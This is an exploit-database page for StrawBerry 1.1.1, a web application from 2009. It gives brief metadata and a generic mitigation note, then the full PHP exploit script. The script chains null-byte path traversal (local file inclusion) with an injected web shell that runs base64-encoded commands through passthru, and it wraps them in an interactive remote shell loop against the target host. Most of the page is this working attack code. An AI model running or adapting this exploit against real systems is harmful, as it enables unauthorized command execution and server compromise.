StrawBerry 1.1.1 LFI / Remote Command Execution Exploit

vendor:

StrawBerry

by:

[AVT]

9,3

CVSS

HIGH

Local File Inclusion (LFI) and Remote Command Execution (RCE)

CWE

Product Name: StrawBerry

Affected Version From: 1.1.1

Affected Version To: 1.1.1

Patch Exists: NO

Related CWE: N/A

CPE: strawberry:strawberry:1.1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

StrawBerry 1.1.1 LFI / Remote Command Execution Exploit

This exploit is used to gain access to the StrawBerry 1.1.1 web application. It is a combination of Local File Inclusion (LFI) and Remote Command Execution (RCE). The exploit is triggered by sending a POST request to the vulnerable application with malicious code in the comment field. This code is then executed by the application, allowing the attacker to gain access to the application.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is not vulnerable to LFI and RCE attacks. This can be done by properly validating user input and using secure coding practices.

Source

Exploit-DB raw data:

<?php

/*********************************************************************
 * StrawBerry 1.1.1 LFI / Remote Command Execution Exploit           *
 * Site: http://strawberry.goodgirl.ru/                              *
 *********************************************************************
 * magic_quotes_gpc = Off                                            *
 *********************************************************************
 * Author: [AVT]                                                     *
 * Date : 10.05.09                                                   *
 * My Site: http://antichat.ru/                                      *
 *********************************************************************/
set_time_limit(0);
error_reporting(0);
list($cli,$host,$path) = $argv;

if ($argc != 3) {  
    
    print "\no-------------------------------------------------------------o\n";
    print "\r|   StrawBerry 1.1.1 LFI / Remote Command Execution Exploit   |\n";
    print "\r|           Site: http://strawberry.goodgirl.ru/              |\n";
    print "\ro-------------------------------------------------------------o\n";
    print "\r| Author: [AVT]                                               |\n";
    print "\r| My Site: http://antichat.ru/                                |\n";
    print "\ro-------------------------------------------------------------o\n";
    print "\r| Usage:   php expl.php [host] [path]                         |\n";
    print "\r| host     localhost                                          |\n";
    print "\r| path     /news/                                             |\n";
    print "\r| Example: php expl.php site.com /news/                       |\n";
    print "\ro-------------------------------------------------------------o\n";
    exit;      
}         
if (check_host ())
	{
	post_shell();
	}
use_shell();

function check_host ()
	{
	global $host,$path;
	$data = "GET {$path}example/index.php?do=../../../../db/base/ipban.MYD%00 HTTP/1.1\r\n";
	$data .= "Host: $host\r\n";
	$data .= "Connection: close\r\n\r\n";
	$html = send ($host,$data);
    	if (!stristr($html,'a:')) 
		{
		print "\ro-------------------------------------------------------------o\n";
		print "\r| Exploit Failed!                                             |\n";
		print "\ro-------------------------------------------------------------o\n";
		exit;
    		}
	elseif (stristr($html,'<code>'))
		{
		return false;
    		}
	else
		{
		return true;
		}
	}


function send ($host,$data) 
	{
	if (!$sock = @fsockopen($host,80)) 
		{
		die("Connection refused, try again!\n");
    		}   	
	fputs($sock,$data);
	while (!feof($sock)) { $html .= fgets($sock); }
	fclose($sock);
	return $html;
	}

function post_shell() 
	{
	global $host,$path;
	$post  = "add_ip=" . urlencode('<code><?php passthru(base64_decode($_GET[cmd]));?></code>') . "&action=add&mod=ipban";
	$data .= "POST {$path}example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1\r\n";
	$data .= "Host: $host\r\n";
	$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
	$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
	$data .= "Content-Length: ".strlen($post)."\r\n\r\n";
	$data .= "$post\r\n\r\n";
	send ($host,$data);
	}


function use_shell()
	{
    	while (1) 
		{
        	echo "[Shell]~$: "; 
        	$cmd = stripslashes(trim(fgets(STDIN)));  
        	if (preg_match('/^(exit|--exit|quit|--quit)$/i',$cmd)) die("\nExited\n");
        	print exec_cmd($cmd);     
		}
	}


function exec_cmd($cmd) 
	{
	global $host,$path;

	$cmd = base64_encode($cmd);
	$data .= "GET {$path}example/index.php?cmd={$cmd}&do=../../../../db/base/ipban.MYD%00 HTTP/1.1\r\n";
	$data .= "Host: $host\r\n";
	$data .= "Connection: close\r\n\r\n";
	$html = send ($host,$data);
	preg_match_all('/<code>(.*)<\/code>/si', $html, $match);
	return $match[1][0];
	}

?>

# milw0rm.com [2009-05-14]